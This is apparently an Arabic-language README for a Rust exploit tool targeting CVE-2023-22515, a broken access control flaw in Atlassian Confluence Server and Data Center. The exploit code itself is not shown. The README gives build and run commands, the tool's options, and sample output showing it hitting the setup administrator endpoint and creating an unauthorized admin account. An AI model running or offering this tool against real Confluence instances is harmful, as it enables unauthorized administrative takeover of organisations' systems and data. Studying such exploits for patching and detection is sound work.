
استغلال مبني على لغة Rust لثغرة CVE-2023-22515 التي تنشئ حسابات مسؤول غير مصرح بها في Confluence Server وData Center عبر التحكم في الوصول المعطوب.
Confluence هو نظام wiki مؤسسي قائم على الويب تم تطويره بواسطة شركة Atlassian الأسترالية للبرمجيات. تم إبلاغ Atlassian بمشكلة أبلغ عنها بعض العملاء حيث قد يكون المهاجمون الخارجيون قد استغلوا ثغرة أمنية غير معروفة سابقًا في خوادم Confluence المتاحة للجمهور ومراكز البيانات لإنشاء حسابات مسؤول Confluence غير مصرح بها والوصول إلى مثيلات Confluence.
تم تصنيف الثغرة الأمنية على أنها CVE-2023-22515
قم أولاً بتنفيذ الترجمة باستخدام الأمر:
cargo build --release
يمكنك القيام بذلك بطريقتين:
cargo run -- --target http://localhost --username "teste" --password "teste"
.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste"
سيؤدي هذا إلى عرض المساعدة الخاصة بالأداة. فيما يلي جميع الخيارات التي تدعمها:
CVE-2023-22515
Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>
Options:
-t, --target <TARGET> Insert target
-u, --username <USERNAME> Insert username
-p, --password <PASSWORD> Insert password
-h, --help Print help
cargo run -- --target http://example.com --username "teste" --password "teste"
[!] Request for: http://example.com/setup/setupadministrator.action
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!